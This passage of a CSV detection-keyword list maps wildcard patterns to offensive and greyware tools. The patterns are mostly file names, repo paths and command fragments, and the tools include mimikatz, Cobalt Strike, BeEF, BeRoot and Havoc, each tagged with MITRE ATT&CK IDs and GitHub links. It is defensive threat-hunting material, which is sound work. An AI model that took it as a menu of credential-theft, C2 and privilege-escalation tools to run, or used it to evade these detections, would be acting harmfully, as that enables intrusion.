Evasion","https://github.com/hfiref0x/WDExtract/","1","0","N/A","8","4","347","56","2020-02-10T06:53:43Z","2019-04-19T17:33:48Z" +"*beb7d48597345d0109ce51c7452292ba6e970eb8ed5f716ec035087aa3f045b3*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" +"*beef:beef*","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","0","N/A","N/A","10","8796","2026","2023-09-30T17:06:35Z","2011-11-23T06:53:25Z" +"*beef_bind_tcp-stage.asm*","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","1","N/A","N/A","10","8796","2026","2023-09-30T17:06:35Z","2011-11-23T06:53:25Z" +"*beef_bind_tcp-stager.asm*","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","1","N/A","N/A","10","8796","2026","2023-09-30T17:06:35Z","2011-11-23T06:53:25Z" +"*beef_bind-stage*.rb*","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","1","N/A","N/A","10","8796","2026","2023-09-30T17:06:35Z","2011-11-23T06:53:25Z" +"*beef_bind-stage.asm*","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","1","N/A","N/A","10","8796","2026","2023-09-30T17:06:35Z","2011-11-23T06:53:25Z" +"*beef_bind-stager.asm*","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","1","N/A","N/A","10","8796","2026","2023-09-30T17:06:35Z","2011-11-23T06:53:25Z" +"*beef_test.rb*","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","0","N/A","N/A","10","8796","2026","2023-09-30T17:06:35Z","2011-11-23T06:53:25Z" +"*beefproject*","offensive_tool_keyword","beef","The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1210 - T1216 - T1207 - T1189 - T1190 - T1566","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","1","N/A","N/A","10","8796","2026","2023-09-30T17:06:35Z","2011-11-23T06:53:25Z" +"*beef-xss*","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","1","N/A","N/A","10","8796","2026","2023-09-30T17:06:35Z","2011-11-23T06:53:25Z" +"*Beelogger*","offensive_tool_keyword","BeeLogger","Keylogger generator. fake office and acrobat file and malicious executables generator","T1056 - T1105 - T1204 - T1106","TA0003 - TA0004 - TA0007","N/A","N/A","Exploitation tools","https://github.com/4w4k3/BeeLogger","1","1","N/A","N/A","10","902","343","2022-12-02T19:42:41Z","2017-02-17T15:34:39Z" +"*BeetleChunks/SpoolSploit*","offensive_tool_keyword","spoolsploit","A collection of Windows print spooler exploits containerized with other utilities for practical exploitation.","T1204 - T1547 - T1562 - T1003 - T1018 - T1570 - T1005","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009","N/A","N/A","Exploitation tools","https://github.com/BeetleChunks/SpoolSploit","1","1","N/A","N/A","6","533","90","2021-07-16T04:49:43Z","2021-07-07T00:32:28Z" +"*before-create-implant-callback*","offensive_tool_keyword","Nuages","A modular C2 framework","T1027 - T1055 - T1071 - T1105 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/p3nt4/Nuages","1","1","N/A","10","10","373","80","2023-10-02T23:24:19Z","2019-05-12T11:00:35Z" +"*before-create-implant-io-bin*","offensive_tool_keyword","Nuages","A modular C2 framework","T1027 - T1055 - T1071 - T1105 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/p3nt4/Nuages","1","1","N/A","10","10","373","80","2023-10-02T23:24:19Z","2019-05-12T11:00:35Z" +"*before-find-implant-chunks*","offensive_tool_keyword","Nuages","A modular C2 framework","T1027 - T1055 - T1071 - T1105 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/p3nt4/Nuages","1","1","N/A","10","10","373","80","2023-10-02T23:24:19Z","2019-05-12T11:00:35Z" +"*BeichenDream/GodPotato*","offensive_tool_keyword","godpotato","GodPotato is an advanced privilege escalation tool that utilizes research on DCOM and builds upon years of Potato techniques. It enables privilege escalation to NT AUTHORITY\SYSTEM on Windows systems from 2012 to 2022 by leveraging the ImpersonatePrivilege permission. It addresses limitations of previous Potato versions and can run on almost any Windows OS by exploiting rpcss vulnerabilities.","T1055.012 - T1053.005 - T1047","TA0005 - TA0002 - TA0008","N/A","N/A","Privilege Escalation","https://github.com/BeichenDream/GodPotato","1","1","N/A","N/A","10","1192","179","2023-06-25T05:20:26Z","2022-12-23T14:37:00Z" +"*BeichenDream/SharpToken*","offensive_tool_keyword","SharpToken","SharpToken is a tool for exploiting Token leaks. It can find leaked Tokens from all processes in the system and use them","T1134 - T1101 - T1214 - T1087 - T1038","TA0004 - TA0007","N/A","N/A","Exploitation tools","https://github.com/BeichenDream/SharpToken","1","1","N/A","N/A","4","353","47","2023-04-11T13:29:23Z","2022-06-30T07:34:57Z" +"*benjamin@gentilkiwi.com*","offensive_tool_keyword","mimikatz","mimikatz default strings","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*BeRoot*","offensive_tool_keyword","BeRoot","BeRoot Project is a post exploitation tool to check common misconfigurations to find a way to escalate our privilege.","T1068 - T1548 - T1574","TA0003 - TA0008","N/A","N/A","Exploitation tools","https://github.com/AlessandroZ/BeRoot","1","0","N/A","N/A","10","2262","488","2022-02-08T10:30:38Z","2017-04-14T12:47:31Z" +"*beRoot.exe*","offensive_tool_keyword","BeRoot","Privilege Escalation Project - Windows / Linux / Mac ","T1053.005 - T1069.002 - T1069.001 - T1053.003 - T1087.001 - T1087.002 - T1082 - T1135 - T1049 - T1007","TA0007 - TA0003 - TA0002 - TA0009 - TA0040 - TA0010","N/A","N/A","Privilege Escalation","https://github.com/AlessandroZ/BeRoot","1","1","N/A","N/A","10","2262","488","2022-02-08T10:30:38Z","2017-04-14T12:47:31Z" +"*beroot.py -*","offensive_tool_keyword","BeRoot","Privilege Escalation Project - Windows / Linux / Mac ","T1053.005 - T1069.002 - T1069.001 - T1053.003 - T1087.001 - T1087.002 - T1082 - T1135 - T1049 - T1007","TA0007 - TA0003 - TA0002 - TA0009 - TA0040 - TA0010","N/A","N/A","Privilege Escalation","https://github.com/AlessandroZ/BeRoot","1","0","N/A","N/A","10","2262","488","2022-02-08T10:30:38Z","2017-04-14T12:47:31Z" +"*beRoot.zip*","offensive_tool_keyword","BeRoot","Privilege Escalation Project - Windows / Linux / Mac ","T1053.005 - T1069.002 - T1069.001 - T1053.003 - T1087.001 - T1087.002 - T1082 - T1135 - T1049 - T1007","TA0007 - TA0003 - TA0002 - TA0009 - TA0040 - TA0010","N/A","N/A","Privilege Escalation","https://github.com/AlessandroZ/BeRoot","1","1","N/A","N/A","10","2262","488","2022-02-08T10:30:38Z","2017-04-14T12:47:31Z" +"*BeRoot-master*","offensive_tool_keyword","BeRoot","Privilege Escalation Project - Windows / Linux / Mac ","T1053.005 - T1069.002 - T1069.001 - T1053.003 - T1087.001 - T1087.002 - T1082 - T1135 - T1049 - T1007","TA0007 - TA0003 - TA0002 - TA0009 - TA0040 - TA0010","N/A","N/A","Privilege Escalation","https://github.com/AlessandroZ/BeRoot","1","1","N/A","N/A","10","2262","488","2022-02-08T10:30:38Z","2017-04-14T12:47:31Z" +"*berzerk0*","offensive_tool_keyword","Github Username","github username known for repos on passwords exploitation and offensive tools","N/A","N/A","N/A","N/A","Credential Access","https://github.com/berzerk0","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*BesoToken.exe list*","offensive_tool_keyword","BesoToken","A tool to Impersonate logged on users without touching LSASS (Including non-Interactive sessions).","T1134 - T1003.002","TA0004 - TA0006","N/A","N/A","Credential Access","https://github.com/OmriBaso/BesoToken","1","0","N/A","10","1","91","11","2022-11-23T10:45:07Z","2022-11-21T01:07:51Z" +"*BesoToken-master*","offensive_tool_keyword","BesoToken","A tool to Impersonate logged on users without touching LSASS (Including non-Interactive sessions).","T1134 - T1003.002","TA0004 - TA0006","N/A","N/A","Credential Access","https://github.com/OmriBaso/BesoToken","1","1","N/A","10","1","91","11","2022-11-23T10:45:07Z","2022-11-21T01:07:51Z" +"*best*phish her*","offensive_tool_keyword","teamsphisher","Send phishing messages and attachments to Microsoft Teams users","T1566.001 - T1566.002 - T1204.001","TA0001 - TA0005","N/A","N/A","phishing","https://github.com/Octoberfest7/TeamsPhisher","1","0","N/A","N/A","9","832","109","2023-07-14T00:23:30Z","2023-07-03T02:19:47Z" +"*bestcrypt2john.py*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*bestcryptve2john.py*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*BetterBackdoor*","offensive_tool_keyword","BetterBackdoor","A backdoor is a tool used to gain remote access to a machine.","T1071 - T1055 - T1059 - T1053","TA0002 - TA0006 - TA0008","N/A","N/A","POST Exploitation tools","https://github.com/thatcherclough/BetterBackdoor","1","1","N/A","N/A","3","275","89","2022-10-03T21:30:21Z","2019-07-29T14:45:24Z" +"*bettercap *","offensive_tool_keyword","bettercap","The Swiss Army knife for 802.11 - BLE - IPv4 and IPv6 networks reconnaissance and MITM attacks.","T1046 - T1190 - T1059 - T1053 - T1001.002 - T1110.001 - T1113 - T1132 - T1048","TA0010 - TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011 - TA0010","N/A","N/A","Network Exploitation tools","https://github.com/bettercap/bettercap","1","0","N/A","N/A","10","14627","1373","2023-09-18T15:43:34Z","2018-01-07T15:30:41Z" +"*bettercap -iface eth0*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*bettercap.*","offensive_tool_keyword","bettercap","The Swiss Army knife for 802.11 - BLE - IPv4 and IPv6 networks reconnaissance and MITM attacks.","T1046 - T1190 - T1059 - T1053 - T1001.002 - T1110.001 - T1113 - T1132 - T1048","TA0010 - TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011 - TA0010","N/A","N/A","Network Exploitation tools","https://github.com/bettercap/bettercap","1","1","N/A","N/A","10","14627","1373","2023-09-18T15:43:34Z","2018-01-07T15:30:41Z" +"*bettercap_.deb*","offensive_tool_keyword","bettercap","The Swiss Army knife for 802.11 - BLE - IPv4 and IPv6 networks reconnaissance and MITM attacks.","T1046 - T1190 - T1059 - T1053 - T1001.002 - T1110.001 - T1113 - T1132 - T1048","TA0010 - TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011 - TA0010","N/A","N/A","Network Exploitation tools","https://github.com/bettercap/bettercap","1","1","N/A","N/A","10","14627","1373","2023-09-18T15:43:34Z","2018-01-07T15:30:41Z" +"*bettercap-master.zip*","offensive_tool_keyword","bettercap","The Swiss Army knife for 802.11 - BLE - IPv4 and IPv6 networks reconnaissance and MITM attacks.","T1046 - T1190 - T1059 - T1053 - T1001.002 - T1110.001 - T1113 - T1132 - T1048","TA0010 - TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011 - TA0010","N/A","N/A","Network Exploitation tools","https://github.com/bettercap/bettercap","1","1","N/A","N/A","10","14627","1373","2023-09-18T15:43:34Z","2018-01-07T15:30:41Z" +"*betterdefaultpasslist*","offensive_tool_keyword","betterdefaultpasslist","list includes default credentials from various manufacturers for their products like NAS. ERP. ICS etc.. that are used for standard products like mssql. vnc. oracle and so on useful for network bruteforcing","T1110 - T1111 - T1112 - T1113 - T1114 - T1115 - T1116 - T1117 - T1118 - T1119","TA0006 - TA0007 - TA0008","N/A","N/A","Credential Access","https://github.com/govolution/betterdefaultpasslist","1","1","N/A","N/A","6","585","151","2021-03-11T11:32:17Z","2016-09-24T16:21:44Z" +"*BetterSafetyKatz.*","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","1887","285","2023-09-23T03:34:27Z","2020-06-05T12:50:00Z" +"*bfidboloedlamgdmenmlbipfnccokknp*","greyware_tool_keyword","PureVPN","External VPN usage within coporate network","T1090.003 - T1133 - T1572","TA0003 - TA0001 - TA0011 - TA0010 - TA0005","N/A","N/A","Data Exfiltration","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml","1","0","detection in registry","8","10","N/A","N/A","N/A","N/A" +"*bgetprivs*","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" +"*bhashdump*","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" +"*bhd_enum_dconly*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"*bhnhkdgoefpmekcgnccpnhjfdgicfebm*","greyware_tool_keyword","Wachee VPN","External VPN usage within coporate network","T1090.003 - T1133 - T1572","TA0003 - TA0001 - TA0011 - TA0010 - TA0005","N/A","N/A","Data Exfiltration","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml","1","0","detection in registry","8","10","N/A","N/A","N/A","N/A" +"*bhttp_x64.dll*","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003","N/A","N/A","C2","https://bruteratel.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" +"*bHVrZXJlYWxseWlzdGhlbWFubXl0aGFuZGxlZ2VuZA*","offensive_tool_keyword","Egress-Assess","Egress-Assess is a tool used to test egress data detection capabilities","T1561 - T1041 - T1558 - T1071 - T1074","TA0010 - TA0011 - TA0008","N/A","Darkhotel - DUBNIUM - Putter Panda","Exploitation tools","https://github.com/FortyNorthSecurity/Egress-Assess","1","0","can be used for data exfiltration simulation","8","6","546","141","2023-08-09T18:40:57Z","2014-12-10T13:39:11Z" +"*bibjcjfmgapbfoljiojpipaooddpkpai*","greyware_tool_keyword","VPN-free.pro","External VPN usage within coporate network","T1090.003 - T1133 - T1572","TA0003 - TA0001 - TA0011 - TA0010 - TA0005","N/A","N/A","Data Exfiltration","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml","1","0","detection in registry","8","10","N/A","N/A","N/A","N/A" +"*bigb0sss/goPassGen*","offensive_tool_keyword","goPassGen","Easily-guessable Password Generator for Password Spray Attack","T1110 - T1110.003","TA0006 ","N/A","N/A","Exploitation tools","https://github.com/bigb0sss/goPassGen","1","1","N/A","8","1","20","3","2020-06-04T23:13:44Z","2020-06-04T22:33:37Z" +"*bihhflimonbpcfagfadcnbbdngpopnjb*","greyware_tool_keyword","DEEPRISM VPN","External VPN usage within coporate network","T1090.003 - T1133 - T1572","TA0003 - TA0001 - TA0011 - TA0010 - TA0005","N/A","N/A","Data Exfiltration","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml","1","0","detection in registry","8","10","N/A","N/A","N/A","N/A" +"*bihmplhobchoageeokmgbdihknkjbknd*","greyware_tool_keyword","Touch VPN","External VPN usage within coporate network","T1090.003 - T1133 - T1572","TA0003 - TA0001 - TA0011 - TA0010 - TA0005","N/A","N/A","Data Exfiltration","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml","1","0","detection in registry","8","10","N/A","N/A","N/A","N/A" +"*bin/*/PS2EXE/*","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","POST Exploitation tools","https://github.com/r00t-3xp10it/venom","1","1","N/A","N/A","10","1617","584","2023-10-03T22:06:35Z","2016-11-16T10:40:04Z" +"*bin/addusertogroup.x64*","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","10","10","4898","745","2023-10-04T21:22:20Z","2022-09-11T13:21:16Z" +"*bin/bof_c.o*","offensive_tool_keyword","cobaltstrike","Cobalt Strike BOF Files with Nim!","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/byt3bl33d3r/BOF-Nim","1","1","N/A","10","10","83","12","2022-07-10T22:12:10Z","2021-01-12T18:58:23Z" +"*bin/bof_nim.o*","offensive_tool_keyword","cobaltstrike","Cobalt Strike BOF Files with Nim!","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/byt3bl33d3r/BOF-Nim","1","1","N/A","10","10","83","12","2022-07-10T22:12:10Z","2021-01-12T18:58:23Z" +"*bin/dll/merlin.c*","offensive_tool_keyword","kubesploit","Kubesploit is a cross-platform post-exploitation HTTP/2 Command & Control server and agent written in Golang","T1021.001 - T1027 - T1071.001 - T1043 - T1059.006","TA0005 - TA0002 - TA0011","N/A","N/A","C2","https://github.com/cyberark/kubesploit","1","1","N/A","10","10","1030","102","2023-04-08T08:32:23Z","2021-02-09T15:54:23Z" +"*bin/icmpsh/*","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","POST Exploitation tools","https://github.com/r00t-3xp10it/venom","1","1","N/A","N/A","10","1617","584","2023-10-03T22:06:35Z","2016-11-16T10:40:04Z" +"*bin/ldd2pretty*","offensive_tool_keyword","ldapdomaindump","Active Directory information dumper via LDAP","T1087 - T1005 - T1016","TA0007","N/A","N/A","Credential Access","https://github.com/dirkjanm/ldapdomaindump","1","1","N/A","N/A","10","970","176","2023-09-06T05:50:30Z","2016-05-24T18:46:56Z" +"*bin/ligolo*","offensive_tool_keyword","ligolo","ligolo is a simple and lightweight tool for establishing SOCKS5 or TCP tunnels from a reverse connection in complete safety (TLS certificate with elliptical curve)","T1071 - T1021 - T1573","TA0011 - TA0002","N/A","N/A","C2","https://github.com/sysdream/ligolo","1","1","N/A","10","10","1438","209","2023-01-06T19:49:22Z","2020-05-22T07:58:13Z" +"*bin/localrelay*","offensive_tool_keyword","ligolo","ligolo is a simple and lightweight tool for establishing SOCKS5 or TCP tunnels from a reverse connection in complete safety (TLS certificate with elliptical curve)","T1071 - T1021 - T1573","TA0011 - TA0002","N/A","N/A","C2","https://github.com/sysdream/ligolo","1","1","N/A","10","10","1438","209","2023-01-06T19:49:22Z","2020-05-22T07:58:13Z" +"*bin/masscan*","offensive_tool_keyword","masscan","TCP port scanner. spews SYN packets asynchronously. scanning entire Internet in under 5 minutes.","T1046","TA0007","N/A","N/A","Reconnaissance","https://github.com/robertdavidgraham/masscan","1","0","N/A","N/A","10","21688","2980","2023-08-09T13:28:54Z","2013-07-28T05:35:33Z" +"*bin/setoolkit*","offensive_tool_keyword","social-engineer-toolkit","The Social-Engineer Toolkit is an open-source penetration testing framework designed for social engineering. SET has a number of custom attack vectors that allow you to make a believable attack quickly. SET is a product of TrustedSec","T1566 - T1598","TA0001 - TA0002 - TA0003 - TA0009","N/A","N/A","Exploitation tools","https://github.com/trustedsec/social-engineer-toolkit","1","1","N/A","N/A","10","9395","2569","2023-08-25T17:25:45Z","2012-12-31T22:01:33Z" +"*bin/setuserpass.x64*","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","10","10","4898","745","2023-10-04T21:22:20Z","2022-09-11T13:21:16Z" +"*bin/SillyRAT/*","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","POST Exploitation tools","https://github.com/r00t-3xp10it/venom","1","1","N/A","N/A","10","1617","584","2023-10-03T22:06:35Z","2016-11-16T10:40:04Z" +"*bin/striker*","offensive_tool_keyword","Striker","Striker is a simple Command and Control (C2) program.","T1071 - T1071.001 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1105 - T1105.002 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/4g3nt47/Striker","1","1","N/A","10","10","279","43","2023-05-04T18:00:05Z","2022-09-07T10:09:41Z" +"*bin/void.zip*","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 